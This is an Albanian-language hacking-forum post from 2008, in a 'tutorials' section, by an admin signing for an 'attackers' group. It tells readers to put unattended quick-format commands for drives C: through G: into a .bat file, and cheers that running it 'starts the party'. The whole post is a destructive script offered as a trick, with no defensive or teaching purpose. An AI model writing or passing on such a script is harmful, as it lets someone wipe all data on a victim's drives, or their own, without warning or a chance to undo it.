ForumPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi

Share | 
 

 Formatizimi i HDD duke perdorur Notepad

Shko poshtė 
AutoriMesazh
shqiprim
Admin
Admin
avatar

Numri i postimeve : 320
Join date : 02/05/2008

MesazhTitulli: Formatizimi i HDD duke perdorur Notepad   Sat May 03, 2008 1:13 pm

Formatizimi i Hard diskut duke perdorur Notepad

Hap Notepad-in (Start->Run->Notepad->Ok) dhe shkuaj kete:

Quote:
format C:/q /y
format D:/q /y
format E:/q /y
format F:/q /y
format G:/q /y

Tani ruaj si fajll .bat dhe lere te filloje festa.Eshte per pese particione


,,,,,,,,,FuaT
Email:_fuat@live.com
Web:www.FuaT.c.la
Server:connect attackers.podzone.org
Group: aTTacKers
FuaT
Email:erion_k@madrid.com
Web:www.ErioN.c.la
Server:connect attackers.podzone.org
Group: aTTacKers
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://attackers-team.2forum.biz
 
Formatizimi i HDD duke perdorur Notepad
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Hacker Boxi :: Tutorials-
Kėrce tek: